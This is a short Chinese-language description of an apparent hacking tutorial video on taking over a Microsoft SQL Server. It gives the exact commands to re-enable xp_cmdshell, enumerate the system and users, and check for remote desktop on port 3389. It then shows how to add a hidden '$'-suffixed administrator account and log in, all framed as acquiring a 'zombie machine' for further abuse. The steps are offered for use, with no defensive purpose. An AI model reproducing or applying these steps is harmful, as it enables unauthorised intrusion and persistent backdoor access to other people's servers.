动画介绍:未能找到存储过程 ’master..xp_cmdshell’。很多朋友遇到这种情况就不知道怎么办了,我们就要用到sql查询分析器,大家看我的操作,,打开的有点慢.打开了我们连接服务器
然后第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’
然后按F5键命令执行完毕....一般情况执行第一步就可以了。好看我操作
可以执行dos命令了,我们查看服务器是什么系统dos口令是type C:\boot.ini
Windows Server 2003,说明服务器是2003系统.
查看一下服务器是内网还是外网一般我们都要外网的肉鸡,这样可以做很多事
dos口令是ipconfig 看下
Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 210.26.7.88 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 210.26.7.1
说明服务器是外网
说明服务器是外网,查看一下有多少管理员dos口令net user
netstat -an是查看服务器开放的端口,我们要入侵服务器可定要开放3389端口如果没有开,网上有很多开3389的工具。不过很多都要做免杀,我们看下他开了3389没有。
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
说明服务器开了3389端口。我们开始添加管理吧!
net user admin$ !@#$ab1 /add这个就是添加管理员的dos口令admin$是用户名后面加个$号是想在dos下查看不到.密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历史的要求。这个也很好解决,密码要复杂一点一般都在6位以上.我们去试下可以了,很多国外的服务器也是这样但是都很简单就搞定了
然后我们提升权限net localgroup administrators admin$ /add这是dos下提升管理的口令,现
我用服务器连接下看好连接成功 | |
安全中国首页 > 动画中心 > 综合漏洞动画
